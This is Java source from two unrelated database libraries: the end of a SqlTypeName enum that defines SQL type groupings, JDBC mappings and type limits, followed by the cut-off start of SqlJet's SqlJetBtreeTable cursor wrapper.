// you probably want to use JDK 1.5 support for treating enumeration
// as collection instead; this is only here to support
// SqlTypeFamily.ANY
public static final List<SqlTypeName> ALL_TYPES =
ImmutableList.of(
BOOLEAN, INTEGER, VARCHAR, DATE, TIME, TIMESTAMP, NULL, DECIMAL,
ANY, CHAR, BINARY, VARBINARY, TINYINT, SMALLINT, BIGINT, REAL,
DOUBLE, SYMBOL, INTERVAL_YEAR, INTERVAL_YEAR_MONTH, INTERVAL_MONTH,
INTERVAL_DAY, INTERVAL_DAY_HOUR, INTERVAL_DAY_MINUTE,
INTERVAL_DAY_SECOND, INTERVAL_HOUR, INTERVAL_HOUR_MINUTE,
INTERVAL_HOUR_SECOND, INTERVAL_MINUTE, INTERVAL_MINUTE_SECOND,
INTERVAL_SECOND, TIME_WITH_LOCAL_TIME_ZONE, TIMESTAMP_WITH_LOCAL_TIME_ZONE,
FLOAT, MULTISET, DISTINCT, STRUCTURED, ROW, CURSOR, COLUMN_LIST);
public static final List<SqlTypeName> BOOLEAN_TYPES =
ImmutableList.of(BOOLEAN);
public static final List<SqlTypeName> BINARY_TYPES =
ImmutableList.of(BINARY, VARBINARY);
public static final List<SqlTypeName> INT_TYPES =
ImmutableList.of(TINYINT, SMALLINT, INTEGER, BIGINT);
public static final List<SqlTypeName> EXACT_TYPES =
combine(INT_TYPES, ImmutableList.of(DECIMAL));
public static final List<SqlTypeName> APPROX_TYPES =
ImmutableList.of(FLOAT, REAL, DOUBLE);
public static final List<SqlTypeName> NUMERIC_TYPES =
combine(EXACT_TYPES, APPROX_TYPES);
public static final List<SqlTypeName> FRACTIONAL_TYPES =
combine(APPROX_TYPES, ImmutableList.of(DECIMAL));
public static final List<SqlTypeName> CHAR_TYPES =
ImmutableList.of(CHAR, VARCHAR);
public static final List<SqlTypeName> STRING_TYPES =
combine(CHAR_TYPES, BINARY_TYPES);
public static final List<SqlTypeName> DATETIME_TYPES =
ImmutableList.of(DATE, TIME, TIME_WITH_LOCAL_TIME_ZONE,
TIMESTAMP, TIMESTAMP_WITH_LOCAL_TIME_ZONE);
public static final Set<SqlTypeName> YEAR_INTERVAL_TYPES =
Sets.immutableEnumSet(SqlTypeName.INTERVAL_YEAR,
SqlTypeName.INTERVAL_YEAR_MONTH,
SqlTypeName.INTERVAL_MONTH);
public static final Set<SqlTypeName> DAY_INTERVAL_TYPES =
Sets.immutableEnumSet(SqlTypeName.INTERVAL_DAY,
SqlTypeName.INTERVAL_DAY_HOUR,
SqlTypeName.INTERVAL_DAY_MINUTE,
SqlTypeName.INTERVAL_DAY_SECOND,
SqlTypeName.INTERVAL_HOUR,
SqlTypeName.INTERVAL_HOUR_MINUTE,
SqlTypeName.INTERVAL_HOUR_SECOND,
SqlTypeName.INTERVAL_MINUTE,
SqlTypeName.INTERVAL_MINUTE_SECOND,
SqlTypeName.INTERVAL_SECOND);
public static final Set<SqlTypeName> INTERVAL_TYPES =
Sets.immutableEnumSet(
Iterables.concat(YEAR_INTERVAL_TYPES, DAY_INTERVAL_TYPES));
private static final Map<Integer, SqlTypeName> JDBC_TYPE_TO_NAME =
ImmutableMap.<Integer, SqlTypeName>builder()
.put(Types.TINYINT, TINYINT)
.put(Types.SMALLINT, SMALLINT)
.put(Types.BIGINT, BIGINT)
.put(Types.INTEGER, INTEGER)
.put(Types.NUMERIC, DECIMAL) // REVIEW
.put(Types.DECIMAL, DECIMAL)
.put(Types.FLOAT, FLOAT)
.put(Types.REAL, REAL)
.put(Types.DOUBLE, DOUBLE)
.put(Types.CHAR, CHAR)
.put(Types.VARCHAR, VARCHAR)
// TODO: provide real support for these eventually
.put(ExtraSqlTypes.NCHAR, CHAR)
.put(ExtraSqlTypes.NVARCHAR, VARCHAR)
// TODO: additional types not yet supported. See ExtraSqlTypes.
// .put(Types.LONGVARCHAR, Longvarchar)
// .put(Types.CLOB, Clob)
// .put(Types.LONGVARBINARY, Longvarbinary)
// .put(Types.BLOB, Blob)
// .put(Types.LONGNVARCHAR, Longnvarchar)
// .put(Types.NCLOB, Nclob)
// .put(Types.ROWID, Rowid)
// .put(Types.SQLXML, Sqlxml)
.put(Types.BINARY, BINARY)
.put(Types.VARBINARY, VARBINARY)
.put(Types.DATE, DATE)
.put(Types.TIME, TIME)
.put(Types.TIMESTAMP, TIMESTAMP)
.put(Types.BIT, BOOLEAN)
.put(Types.BOOLEAN, BOOLEAN)
.put(Types.DISTINCT, DISTINCT)
.put(Types.STRUCT, STRUCTURED)
.put(Types.ARRAY, ARRAY)
.build();
/**
* Bitwise-or of flags indicating allowable precision/scale combinations.
*/
private final int signatures;
/**
   * True if this is not a "pure" standard SQL type. "Impure" types are
   * {@link #ANY}, {@link #NULL} and {@link #SYMBOL}.
*/
private final boolean special;
private final int jdbcOrdinal;
private final SqlTypeFamily family;
SqlTypeName(int signatures, boolean special, int jdbcType,
SqlTypeFamily family) {
this.signatures = signatures;
this.special = special;
this.jdbcOrdinal = jdbcType;
this.family = family;
}
/**
* Looks up a type name from its name.
*
* @return Type name, or null if not found
*/
public static SqlTypeName get(String name) {
if (false) {
// The following code works OK, but the spurious exceptions are
// annoying.
try {
return SqlTypeName.valueOf(name);
} catch (IllegalArgumentException e) {
return null;
}
}
return VALUES_MAP.get(name);
}
public boolean allowsNoPrecNoScale() {
return (signatures & PrecScale.NO_NO) != 0;
}
public boolean allowsPrecNoScale() {
return (signatures & PrecScale.YES_NO) != 0;
}
public boolean allowsPrec() {
return allowsPrecScale(true, true)
|| allowsPrecScale(true, false);
}
public boolean allowsScale() {
return allowsPrecScale(true, true);
}
/**
* Returns whether this type can be specified with a given combination of
* precision and scale. For example,
*
* <ul>
* <li><code>Varchar.allowsPrecScale(true, false)</code> returns <code>
* true</code>, because the VARCHAR type allows a precision parameter, as in
* <code>VARCHAR(10)</code>.</li>
   * <li><code>Varchar.allowsPrecScale(true, true)</code> returns <code>
   * false</code>, because the VARCHAR type does not allow both a precision and a
   * scale parameter, as in <code>VARCHAR(10, 4)</code>.</li>
* <li><code>allowsPrecScale(false, true)</code> returns <code>false</code>
* for every type.</li>
* </ul>
*
* @param precision Whether the precision/length field is part of the type
* specification
* @param scale Whether the scale field is part of the type specification
* @return Whether this combination of precision/scale is valid
*/
public boolean allowsPrecScale(
boolean precision,
boolean scale) {
int mask =
precision ? (scale ? PrecScale.YES_YES : PrecScale.YES_NO)
: (scale ? 0 : PrecScale.NO_NO);
return (signatures & mask) != 0;
}
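  // Worked examples matching the javadoc above (VARCHAR is declared with PrecScale.NO_NO | PrecScale.YES_NO):
  //
  //   VARCHAR.allowsPrecScale(true, false)  // true:  VARCHAR(10) is legal
  //   VARCHAR.allowsPrecScale(true, true)   // false: VARCHAR(10, 4) is not legal
  //   VARCHAR.allowsPrecScale(false, true)  // false for every type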
public boolean isSpecial() {
return special;
}
/** Returns the ordinal from {@link java.sql.Types} corresponding to this
* SqlTypeName. */
public int getJdbcOrdinal() {
return jdbcOrdinal;
}
private static List<SqlTypeName> combine(
List<SqlTypeName> list0,
List<SqlTypeName> list1) {
return ImmutableList.<SqlTypeName>builder()
.addAll(list0)
.addAll(list1)
.build();
}
/** Returns the default scale for this type if supported, otherwise -1 if
* scale is either unsupported or must be specified explicitly. */
public int getDefaultScale() {
switch (this) {
case DECIMAL:
return 0;
case INTERVAL_YEAR:
case INTERVAL_YEAR_MONTH:
case INTERVAL_MONTH:
case INTERVAL_DAY:
case INTERVAL_DAY_HOUR:
case INTERVAL_DAY_MINUTE:
case INTERVAL_DAY_SECOND:
case INTERVAL_HOUR:
case INTERVAL_HOUR_MINUTE:
case INTERVAL_HOUR_SECOND:
case INTERVAL_MINUTE:
case INTERVAL_MINUTE_SECOND:
case INTERVAL_SECOND:
return DEFAULT_INTERVAL_FRACTIONAL_SECOND_PRECISION;
default:
return -1;
}
}
/**
* Gets the SqlTypeFamily containing this SqlTypeName.
*
* @return containing family, or null for none
*/
public SqlTypeFamily getFamily() {
return family;
}
/**
* Gets the SqlTypeName corresponding to a JDBC type.
*
* @param jdbcType the JDBC type of interest
* @return corresponding SqlTypeName, or null if the type is not known
*/
public static SqlTypeName getNameForJdbcType(int jdbcType) {
return JDBC_TYPE_TO_NAME.get(jdbcType);
}
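  // Illustrative lookups against the JDBC_TYPE_TO_NAME map above:
  //
  //   SqlTypeName.getNameForJdbcType(java.sql.Types.VARCHAR)  // VARCHAR
  //   SqlTypeName.getNameForJdbcType(java.sql.Types.NUMERIC)  // DECIMAL (see the REVIEW note in the map)
  //   SqlTypeName.getNameForJdbcType(java.sql.Types.CLOB)     // null - not mapped yet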
/**
* Returns the limit of this datatype. For example,
*
* <table border="1">
* <caption>Datatype limits</caption>
* <tr>
* <th>Datatype</th>
* <th>sign</th>
* <th>limit</th>
* <th>beyond</th>
* <th>precision</th>
* <th>scale</th>
* <th>Returns</th>
* </tr>
* <tr>
* <td>Integer</td>
* <td>true</td>
* <td>true</td>
* <td>false</td>
* <td>-1</td>
* <td>-1</td>
* <td>2147483647 (2 ^ 31 -1 = MAXINT)</td>
* </tr>
* <tr>
* <td>Integer</td>
* <td>true</td>
* <td>true</td>
* <td>true</td>
* <td>-1</td>
* <td>-1</td>
* <td>2147483648 (2 ^ 31 = MAXINT + 1)</td>
* </tr>
* <tr>
* <td>Integer</td>
* <td>false</td>
* <td>true</td>
* <td>false</td>
* <td>-1</td>
* <td>-1</td>
* <td>-2147483648 (-2 ^ 31 = MININT)</td>
* </tr>
* <tr>
* <td>Boolean</td>
* <td>true</td>
* <td>true</td>
* <td>false</td>
* <td>-1</td>
* <td>-1</td>
* <td>TRUE</td>
* </tr>
* <tr>
* <td>Varchar</td>
* <td>true</td>
* <td>true</td>
* <td>false</td>
* <td>10</td>
* <td>-1</td>
* <td>'ZZZZZZZZZZ'</td>
* </tr>
* </table>
*
* @param sign If true, returns upper limit, otherwise lower limit
   * @param limit If Limit.OVERFLOW, returns a value at or near to overflow; if
   * Limit.UNDERFLOW, a value at or near to underflow; if Limit.ZERO, zero
* @param beyond If true, returns the value just beyond the limit,
* otherwise the value at the limit
* @param precision Precision, or -1 if not applicable
* @param scale Scale, or -1 if not applicable
* @return Limit value
*/
public Object getLimit(
boolean sign,
Limit limit,
boolean beyond,
int precision,
int scale) {
assert allowsPrecScale(precision != -1, scale != -1) : this;
if (limit == Limit.ZERO) {
if (beyond) {
return null;
}
sign = true;
}
Calendar calendar;
switch (this) {
case BOOLEAN:
switch (limit) {
case ZERO:
return false;
case UNDERFLOW:
return null;
case OVERFLOW:
if (beyond || !sign) {
return null;
} else {
return true;
}
default:
throw Util.unexpected(limit);
}
case TINYINT:
return getNumericLimit(2, 8, sign, limit, beyond);
case SMALLINT:
return getNumericLimit(2, 16, sign, limit, beyond);
case INTEGER:
return getNumericLimit(2, 32, sign, limit, beyond);
case BIGINT:
return getNumericLimit(2, 64, sign, limit, beyond);
case DECIMAL:
BigDecimal decimal =
getNumericLimit(10, precision, sign, limit, beyond);
if (decimal == null) {
return null;
}
// Decimal values must fit into 64 bits. So, the maximum value of
// a DECIMAL(19, 0) is 2^63 - 1, not 10^19 - 1.
switch (limit) {
case OVERFLOW:
final BigDecimal other =
(BigDecimal) BIGINT.getLimit(sign, limit, beyond, -1, -1);
if (decimal.compareTo(other) == (sign ? 1 : -1)) {
decimal = other;
}
}
// Apply scale.
if (scale == 0) {
// do nothing
} else if (scale > 0) {
decimal = decimal.divide(BigDecimal.TEN.pow(scale));
} else {
decimal = decimal.multiply(BigDecimal.TEN.pow(-scale));
}
return decimal;
case CHAR:
case VARCHAR:
if (!sign) {
return null; // this type does not have negative values
}
StringBuilder buf = new StringBuilder();
switch (limit) {
case ZERO:
break;
case UNDERFLOW:
if (beyond) {
// There is no value between the empty string and the
// smallest non-empty string.
return null;
}
buf.append("a");
break;
case OVERFLOW:
for (int i = 0; i < precision; ++i) {
buf.append("Z");
}
if (beyond) {
buf.append("Z");
}
break;
}
return buf.toString();
case BINARY:
case VARBINARY:
if (!sign) {
return null; // this type does not have negative values
}
byte[] bytes;
switch (limit) {
case ZERO:
bytes = new byte[0];
break;
case UNDERFLOW:
if (beyond) {
// There is no value between the empty string and the
// smallest value.
return null;
}
bytes = new byte[]{0x00};
break;
case OVERFLOW:
bytes = new byte[precision + (beyond ? 1 : 0)];
Arrays.fill(bytes, (byte) 0xff);
break;
default:
throw Util.unexpected(limit);
}
return bytes;
case DATE:
calendar = Util.calendar();
switch (limit) {
case ZERO:
// The epoch.
calendar.set(Calendar.YEAR, 1970);
calendar.set(Calendar.MONTH, 0);
calendar.set(Calendar.DAY_OF_MONTH, 1);
break;
case UNDERFLOW:
return null;
case OVERFLOW:
if (beyond) {
// It is impossible to represent an invalid year as a date
// literal. SQL dates are represented as 'yyyy-mm-dd', and
// 1 <= yyyy <= 9999 is valid. There is no year 0: the year
// before 1AD is 1BC, so SimpleDateFormat renders the day
// before 0001-01-01 (AD) as 0001-12-31 (BC), which looks
// like a valid date.
return null;
}
// "SQL:2003 6.1 <data type> Access Rules 6" says that year is
// between 1 and 9999, and days/months are the valid Gregorian
// calendar values for these years.
if (sign) {
calendar.set(Calendar.YEAR, 9999);
calendar.set(Calendar.MONTH, 11);
calendar.set(Calendar.DAY_OF_MONTH, 31);
} else {
calendar.set(Calendar.YEAR, 1);
calendar.set(Calendar.MONTH, 0);
calendar.set(Calendar.DAY_OF_MONTH, 1);
}
break;
}
calendar.set(Calendar.HOUR_OF_DAY, 0);
calendar.set(Calendar.MINUTE, 0);
calendar.set(Calendar.SECOND, 0);
return calendar;
case TIME:
if (!sign) {
return null; // this type does not have negative values
}
if (beyond) {
return null; // invalid values are impossible to represent
}
calendar = Util.calendar();
switch (limit) {
case ZERO:
// The epoch.
calendar.set(Calendar.HOUR_OF_DAY, 0);
calendar.set(Calendar.MINUTE, 0);
calendar.set(Calendar.SECOND, 0);
calendar.set(Calendar.MILLISECOND, 0);
break;
case UNDERFLOW:
return null;
case OVERFLOW:
calendar.set(Calendar.HOUR_OF_DAY, 23);
calendar.set(Calendar.MINUTE, 59);
calendar.set(Calendar.SECOND, 59);
int millis =
(precision >= 3) ? 999
: ((precision == 2) ? 990 : ((precision == 1) ? 900 : 0));
calendar.set(Calendar.MILLISECOND, millis);
break;
}
return calendar;
case TIMESTAMP:
calendar = Util.calendar();
switch (limit) {
case ZERO:
// The epoch.
calendar.set(Calendar.YEAR, 1970);
calendar.set(Calendar.MONTH, 0);
calendar.set(Calendar.DAY_OF_MONTH, 1);
calendar.set(Calendar.HOUR_OF_DAY, 0);
calendar.set(Calendar.MINUTE, 0);
calendar.set(Calendar.SECOND, 0);
calendar.set(Calendar.MILLISECOND, 0);
break;
case UNDERFLOW:
return null;
case OVERFLOW:
if (beyond) {
// It is impossible to represent an invalid year as a date
// literal. SQL dates are represented as 'yyyy-mm-dd', and
// 1 <= yyyy <= 9999 is valid. There is no year 0: the year
// before 1AD is 1BC, so SimpleDateFormat renders the day
// before 0001-01-01 (AD) as 0001-12-31 (BC), which looks
// like a valid date.
return null;
}
// "SQL:2003 6.1 <data type> Access Rules 6" says that year is
// between 1 and 9999, and days/months are the valid Gregorian
// calendar values for these years.
if (sign) {
calendar.set(Calendar.YEAR, 9999);
calendar.set(Calendar.MONTH, 11);
calendar.set(Calendar.DAY_OF_MONTH, 31);
calendar.set(Calendar.HOUR_OF_DAY, 23);
calendar.set(Calendar.MINUTE, 59);
calendar.set(Calendar.SECOND, 59);
int millis =
(precision >= 3) ? 999
: ((precision == 2) ? 990
: ((precision == 1) ? 900 : 0));
calendar.set(Calendar.MILLISECOND, millis);
} else {
calendar.set(Calendar.YEAR, 1);
calendar.set(Calendar.MONTH, 0);
calendar.set(Calendar.DAY_OF_MONTH, 1);
calendar.set(Calendar.HOUR_OF_DAY, 0);
calendar.set(Calendar.MINUTE, 0);
calendar.set(Calendar.SECOND, 0);
calendar.set(Calendar.MILLISECOND, 0);
}
break;
}
return calendar;
default:
throw Util.unexpected(this);
}
}
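  // Illustrative calls, mirroring the first rows of the table in the javadoc above (results are BigDecimal):
  //
  //   INTEGER.getLimit(true, Limit.OVERFLOW, false, -1, -1)   // 2147483647  (2^31 - 1, MAXINT)
  //   INTEGER.getLimit(true, Limit.OVERFLOW, true, -1, -1)    // 2147483648  (just beyond MAXINT)
  //   INTEGER.getLimit(false, Limit.OVERFLOW, false, -1, -1)  // -2147483648 (-2^31, MININT)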
/**
* Returns the minimum precision (or length) allowed for this type, or -1 if
* precision/length are not applicable for this type.
*
* @return Minimum allowed precision
*/
public int getMinPrecision() {
switch (this) {
case DECIMAL:
case VARCHAR:
case CHAR:
case VARBINARY:
case BINARY:
case TIME:
case TIME_WITH_LOCAL_TIME_ZONE:
case TIMESTAMP:
case TIMESTAMP_WITH_LOCAL_TIME_ZONE:
return 1;
case INTERVAL_YEAR:
case INTERVAL_YEAR_MONTH:
case INTERVAL_MONTH:
case INTERVAL_DAY:
case INTERVAL_DAY_HOUR:
case INTERVAL_DAY_MINUTE:
case INTERVAL_DAY_SECOND:
case INTERVAL_HOUR:
case INTERVAL_HOUR_MINUTE:
case INTERVAL_HOUR_SECOND:
case INTERVAL_MINUTE:
case INTERVAL_MINUTE_SECOND:
case INTERVAL_SECOND:
return MIN_INTERVAL_START_PRECISION;
default:
return -1;
}
}
/**
* Returns the minimum scale (or fractional second precision in the case of
* intervals) allowed for this type, or -1 if precision/length are not
* applicable for this type.
*
* @return Minimum allowed scale
*/
public int getMinScale() {
switch (this) {
// TODO: Minimum numeric scale for decimal
case INTERVAL_YEAR:
case INTERVAL_YEAR_MONTH:
case INTERVAL_MONTH:
case INTERVAL_DAY:
case INTERVAL_DAY_HOUR:
case INTERVAL_DAY_MINUTE:
case INTERVAL_DAY_SECOND:
case INTERVAL_HOUR:
case INTERVAL_HOUR_MINUTE:
case INTERVAL_HOUR_SECOND:
case INTERVAL_MINUTE:
case INTERVAL_MINUTE_SECOND:
case INTERVAL_SECOND:
return MIN_INTERVAL_FRACTIONAL_SECOND_PRECISION;
default:
return -1;
}
}
  /** Returns the leading time unit; for example, {@code HOUR} for both
   * {@code HOUR TO SECOND} and {@code HOUR}, and {@code SECOND} for {@code SECOND}. */
public TimeUnit getStartUnit() {
switch (this) {
case INTERVAL_YEAR:
case INTERVAL_YEAR_MONTH:
return TimeUnit.YEAR;
case INTERVAL_MONTH:
return TimeUnit.MONTH;
case INTERVAL_DAY:
case INTERVAL_DAY_HOUR:
case INTERVAL_DAY_MINUTE:
case INTERVAL_DAY_SECOND:
return TimeUnit.DAY;
case INTERVAL_HOUR:
case INTERVAL_HOUR_MINUTE:
case INTERVAL_HOUR_SECOND:
return TimeUnit.HOUR;
case INTERVAL_MINUTE:
case INTERVAL_MINUTE_SECOND:
return TimeUnit.MINUTE;
case INTERVAL_SECOND:
return TimeUnit.SECOND;
default:
throw new AssertionError(this);
}
}
  /** Returns the trailing time unit; for example, {@code SECOND} for both
   * {@code HOUR TO SECOND} and {@code SECOND}. */
public TimeUnit getEndUnit() {
switch (this) {
case INTERVAL_YEAR:
return TimeUnit.YEAR;
case INTERVAL_YEAR_MONTH:
case INTERVAL_MONTH:
return TimeUnit.MONTH;
case INTERVAL_DAY:
return TimeUnit.DAY;
case INTERVAL_DAY_HOUR:
case INTERVAL_HOUR:
return TimeUnit.HOUR;
case INTERVAL_DAY_MINUTE:
case INTERVAL_HOUR_MINUTE:
case INTERVAL_MINUTE:
return TimeUnit.MINUTE;
case INTERVAL_DAY_SECOND:
case INTERVAL_HOUR_SECOND:
case INTERVAL_MINUTE_SECOND:
case INTERVAL_SECOND:
return TimeUnit.SECOND;
default:
throw new AssertionError(this);
}
}
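  // For example, per the two methods above:
  //
  //   INTERVAL_DAY_SECOND.getStartUnit()  // TimeUnit.DAY
  //   INTERVAL_DAY_SECOND.getEndUnit()    // TimeUnit.SECOND
  //   INTERVAL_HOUR.getStartUnit()        // TimeUnit.HOUR
  //   INTERVAL_HOUR.getEndUnit()          // TimeUnit.HOUR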
public boolean isYearMonth() {
switch (this) {
case INTERVAL_YEAR:
case INTERVAL_YEAR_MONTH:
case INTERVAL_MONTH:
return true;
default:
return false;
}
}
/** Limit. */
public enum Limit {
ZERO, UNDERFLOW, OVERFLOW
}
private BigDecimal getNumericLimit(
int radix,
int exponent,
boolean sign,
Limit limit,
boolean beyond) {
switch (limit) {
case OVERFLOW:
// 2-based schemes run from -2^(N-1) to 2^(N-1)-1 e.g. -128 to +127
// 10-based schemas run from -(10^N-1) to 10^N-1 e.g. -99 to +99
final BigDecimal bigRadix = BigDecimal.valueOf(radix);
if (radix == 2) {
--exponent;
}
BigDecimal decimal = bigRadix.pow(exponent);
if (sign || (radix != 2)) {
decimal = decimal.subtract(BigDecimal.ONE);
}
if (beyond) {
decimal = decimal.add(BigDecimal.ONE);
}
if (!sign) {
decimal = decimal.negate();
}
return decimal;
case UNDERFLOW:
return beyond ? null
: (sign ? BigDecimal.ONE : BigDecimal.ONE.negate());
case ZERO:
return BigDecimal.ZERO;
default:
throw Util.unexpected(limit);
}
}
public SqlLiteral createLiteral(Object o, SqlParserPos pos) {
switch (this) {
case BOOLEAN:
return SqlLiteral.createBoolean((Boolean) o, pos);
case TINYINT:
case SMALLINT:
case INTEGER:
case BIGINT:
case DECIMAL:
return SqlLiteral.createExactNumeric(o.toString(), pos);
case VARCHAR:
case CHAR:
return SqlLiteral.createCharString((String) o, pos);
case VARBINARY:
case BINARY:
return SqlLiteral.createBinaryString((byte[]) o, pos);
case DATE:
return SqlLiteral.createDate(o instanceof Calendar
? DateString.fromCalendarFields((Calendar) o)
: (DateString) o, pos);
case TIME:
return SqlLiteral.createTime(o instanceof Calendar
? TimeString.fromCalendarFields((Calendar) o)
: (TimeString) o, 0 /* todo */, pos);
case TIMESTAMP:
return SqlLiteral.createTimestamp(o instanceof Calendar
? TimestampString.fromCalendarFields((Calendar) o)
: (TimestampString) o, 0 /* todo */, pos);
default:
throw Util.unexpected(this);
}
}
/** Returns the name of this type. */
public String getName() {
return toString();
}
/**
* Flags indicating precision/scale combinations.
*
* <p>Note: for intervals:
*
* <ul>
* <li>precision = start (leading field) precision</li>
* <li>scale = fractional second precision</li>
* </ul>
*/
private interface PrecScale {
int NO_NO = 1;
int YES_NO = 2;
int YES_YES = 4;
}
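  // For example, DECIMAL is declared above with PrecScale.NO_NO | PrecScale.YES_NO | PrecScale.YES_YES,
  // so DECIMAL, DECIMAL(p) and DECIMAL(p, s) are all accepted, whereas DATE (PrecScale.NO_NO only)
  // accepts neither precision nor scale.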
}
|
|
/**
* SqlJetTableWrapper.java
* Copyright (C) 2009-2013 TMate Software Ltd
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; version 2 of the License.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*/
package org.tmatesoft.sqljet.core.internal.table;
import java.util.List;
import java.util.Random;
import java.util.Stack;
import org.tmatesoft.sqljet.core.SqlJetEncoding;
import org.tmatesoft.sqljet.core.SqlJetErrorCode;
import org.tmatesoft.sqljet.core.SqlJetException;
import org.tmatesoft.sqljet.core.SqlJetValueType;
import org.tmatesoft.sqljet.core.internal.ISqlJetBtree;
import org.tmatesoft.sqljet.core.internal.ISqlJetBtreeCursor;
import org.tmatesoft.sqljet.core.internal.ISqlJetMemoryPointer;
import org.tmatesoft.sqljet.core.internal.ISqlJetVdbeMem;
import org.tmatesoft.sqljet.core.internal.SqlJetBtreeTableCreateFlags;
import org.tmatesoft.sqljet.core.internal.SqlJetUtility;
import org.tmatesoft.sqljet.core.internal.vdbe.SqlJetBtreeRecord;
import org.tmatesoft.sqljet.core.internal.vdbe.SqlJetKeyInfo;
/**
* @author TMate Software Ltd.
* @author Sergey Scherbina ([email protected])
*
*/
public class SqlJetBtreeTable implements ISqlJetBtreeTable {
protected ISqlJetBtree btree;
protected int rootPage;
protected boolean write;
protected boolean index;
private long priorNewRowid = 0;
private SqlJetBtreeRecord recordCache;
private Object[] valueCache;
private Object[] valuesCache;
private Stack<State> states;
protected static class State {
private ISqlJetBtreeCursor cursor;
private SqlJetKeyInfo keyInfo;
public State(ISqlJetBtreeCursor cursor, SqlJetKeyInfo keyInfo) {
this.cursor = cursor;
this.keyInfo = keyInfo;
}
public ISqlJetBtreeCursor getCursor() {
return cursor;
}
public SqlJetKeyInfo getKeyInfo() {
return keyInfo;
}
public void close() throws SqlJetException {
if (cursor != null) {
cursor.closeCursor();
}
}
}
/**
     * @param btree    btree to operate on
     * @param rootPage root page of the table in the btree
     * @param write    whether the table is opened for writing
     * @param index    whether the table is an index rather than a data table
* @throws SqlJetException
*/
public SqlJetBtreeTable(ISqlJetBtree btree, int rootPage, boolean write, boolean index) throws SqlJetException {
init(btree, rootPage, write, index);
}
/**
     * @param btree    btree to operate on
     * @param rootPage root page of the table in the btree
     * @param write    whether the table is opened for writing
     * @param index    whether the table is an index rather than a data table
* @throws SqlJetException
*/
private void init(ISqlJetBtree btree, int rootPage, boolean write, boolean index) throws SqlJetException {
this.states = new Stack<State>();
this.btree = btree;
this.rootPage = rootPage;
this.write = write;
this.index = index;
pushState();
first();
}
private State getCurrentState() {
assert !states.isEmpty();
return states.peek();
}
protected ISqlJetBtreeCursor getCursor() {
return getCurrentState().getCursor();
}
protected SqlJetKeyInfo getKeyInfo() {
return getCurrentState().getKeyInfo();
}
public void pushState() throws SqlJetException {
SqlJetKeyInfo keyInfo = null;
if (index) {
keyInfo = new SqlJetKeyInfo();
keyInfo.setEnc(btree.getDb().getOptions().getEncoding());
}
ISqlJetBtreeCursor cursor = btree.getCursor(rootPage, write, index ? keyInfo : null);
states.push(new State(cursor, keyInfo));
clearRecordCache();
adjustKeyInfo();
}
protected void adjustKeyInfo() throws SqlJetException {
}
public boolean popState() throws SqlJetException {
if (states.size() <= 1) {
return false;
}
State oldState = states.pop();
oldState.close();
clearRecordCache();
return true;
}
/*
* (non-Javadoc)
*
* @see org.tmatesoft.sqljet.core.internal.btree.ISqlJetBtreeTable#close()
*/
public void close() throws SqlJetException {
while(popState()) {}
clearRecordCache();
getCurrentState().close();
}
/*
* (non-Javadoc)
*
* @see org.tmatesoft.sqljet.core.ISqlJetBtreeTable#unlock()
*/
public void unlock() {
getCursor().leaveCursor();
}
/*
* (non-Javadoc)
*
* @see org.tmatesoft.sqljet.core.ISqlJetBtreeTable#lock()
*/
public void lock() throws SqlJetException {
getCursor().enterCursor();
}
/*
* (non-Javadoc)
*
* @see org.tmatesoft.sqljet.core.internal.btree.ISqlJetBtreeTable#eof()
*/
public boolean eof() throws SqlJetException {
hasMoved();
return getCursor().eof();
}
/**
* @throws SqlJetException
*/
public boolean hasMoved() throws SqlJetException {
getCursor().enterCursor();
try {
return getCursor().cursorHasMoved();
} finally {
getCursor().leaveCursor();
}
}
/*
* (non-Javadoc)
*
* @see org.tmatesoft.sqljet.core.ISqlJetBtreeTable#first()
*/
public boolean first() throws SqlJetException {
lock();
try {
clearRecordCache();
return !getCursor().first();
} finally {
unlock();
}
}
/*
* (non-Javadoc)
*
* @see org.tmatesoft.sqljet.core.ISqlJetBtreeTable#last()
*/
public boolean last() throws SqlJetException {
lock();
try {
clearRecordCache();
return !getCursor().last();
} finally {
unlock();
}
}
/*
* (non-Javadoc)
*
* @see org.tmatesoft.sqljet.core.internal.btree.ISqlJetBtreeTable#next()
*/
public boolean next() throws SqlJetException {
lock();
try {
clearRecordCache();
hasMoved();
return !getCursor().next();
} finally {
unlock();
}
}
/*
* (non-Javadoc)
*
* @see org.tmatesoft.sqljet.core.ISqlJetBtreeTable#previous()
*/
public boolean previous() throws SqlJetException {
lock();
try {
clearRecordCache();
hasMoved();
return !getCursor().previous();
} finally {
unlock();
}
}
/*
* (non-Javadoc)
*
* @see org.tmatesoft.sqljet.core.internal.btree.ISqlJetBtreeTable#getRecord
*/
public ISqlJetBtreeRecord getRecord() throws SqlJetException {
if (eof())
return null;
if (null == recordCache) {
lock();
try {
recordCache = new SqlJetBtreeRecord(getCursor(), index, btree.getDb().getOptions().getFileFormat());
} finally {
unlock();
}
valueCache = new Object[recordCache.getFieldsCount()];
}
return recordCache;
}
/*
* (non-Javadoc)
*
* @see
* org.tmatesoft.sqljet.core.internal.table.ISqlJetBtreeTable#lockTable(
* boolean)
*/
public void lockTable(boolean write) {
btree.lockTable(rootPage, write);
}
/*
* (non-Javadoc)
*
* @see
* org.tmatesoft.sqljet.core.internal.table.ISqlJetBtreeTable#getEncoding()
*/
public SqlJetEncoding getEncoding() throws SqlJetException {
return getCursor().getCursorDb().getOptions().getEncoding();
}
protected static boolean checkField(ISqlJetBtreeRecord record, int field) throws SqlJetException {
return (field >= 0 && record != null && field < record.getFieldsCount());
}
protected ISqlJetVdbeMem getValueMem(int field) throws SqlJetException {
final ISqlJetBtreeRecord r = getRecord();
if (null == r)
return null;
if (!checkField(r, field))
return null;
final List<ISqlJetVdbeMem> fields = r.getFields();
if (null == fields)
return null;
return fields.get(field);
}
public Object getValue(int field) throws SqlJetException {
if (valueCache != null && field < valueCache.length) {
final Object valueCached = valueCache[field];
if (valueCached != null)
return valueCached;
}
final Object valueUncached = getValueUncached(field);
if (valueUncached != null) {
valueCache[field] = valueUncached;
}
return valueUncached;
}
public Object getValueUncached(int field) throws SqlJetException {
final ISqlJetVdbeMem value = getValueMem(field);
if (value == null || value.isNull())
return null;
switch (value.getType()) {
case INTEGER:
return value.intValue();
case FLOAT:
return value.realValue();
case TEXT:
return SqlJetUtility.toString(value.valueText(getEncoding()), getEncoding());
case BLOB:
return value.valueBlob();
case NULL:
break;
default:
break;
}
return null;
}
/*
* (non-Javadoc)
*
* @see
